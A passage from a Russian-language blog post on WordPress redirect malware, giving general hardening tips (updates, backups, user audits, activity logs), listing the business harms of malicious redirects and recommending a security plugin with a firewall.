7. Защитите WordPress: существуют меры по ужесточению безопасности, широко известные как усиление защиты WordPress. Я хотел бы предостеречь вас, чтобы вы не забывали следовать крутым советам, доступным в Интернете. Некоторые из них совершенно нерабочие и повлияют на ваш сайт и впечатления посетителей.
8. Имейте план обеспечения безопасности/действия, которые нужно делать регулярно: недостаточно сделать что-то одно только один раз и забыть о нем. По крайней мере, регулярно проверяйте пользователей и требуйте сброса пароля. Установка журнала активности также является хорошей идеей, так как она позволяет легко и быстро отслеживать действия пользователя, что часто может быть ранним сигналом взломанного сайта.
9. Вы также должны все обновлять: WordPress, плагины и темы , и делать регулярные резервные копии.

Каковы последствия вредоносных перенаправлений?

Любой взлом оказывает ужасное влияние на веб-сайт, и вредоносное ПО для перенаправления WordPress ничем не отличается. Вот лишь некоторые из способов, которыми вредоносное ПО может негативно повлиять на ваш веб-сайт и бизнес:

  • Потеря дохода, если у вас есть сайт электронной коммерции или бизнес-сайт.
  • Потеря ценности бренда из-за перенаправления посетителей на незаконные, мошеннические или спам-сайты.
  • Влияние на SEO, потому что Google наказывает взломанные сайты в своих списках и помечает взломанный сайт, чтобы посетители вообще боялись его посещать.
  • Нарушение данных ваших посетителей и вашего сайта.
Есть еще много способов, которыми взлом может причинить материальный ущерб. Критический фактор — действовать быстро и избавиться от вредоносного ПО как можно скорее.

Вывод

Вредоносная программа взломанного перенаправления WordPress время от времени появляется в новом аватаре. Хакеры и, следовательно, их вредоносное ПО становятся все умнее и умнее. Веб-сайты WordPress являются для них сокровищницей, и единственный способ превзойти их — опережать их игру.

Лучший способ защитить свой веб-сайт WordPress — установить хороший плагин безопасности, который также поставляется со встроенным брандмауэром. Это, без сомнения, лучшая инвестиция в безопасность вашего сайта.

Спасибо, что читаешь Nicola Top

Насколько публикация полезна?

Нажмите на смайлик, чтобы оценить!

Средняя оценка 5 / 5. Количество оценок: 9

Оценок пока нет. Поставьте оценку первым.

Читайте также:

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

2 × пять =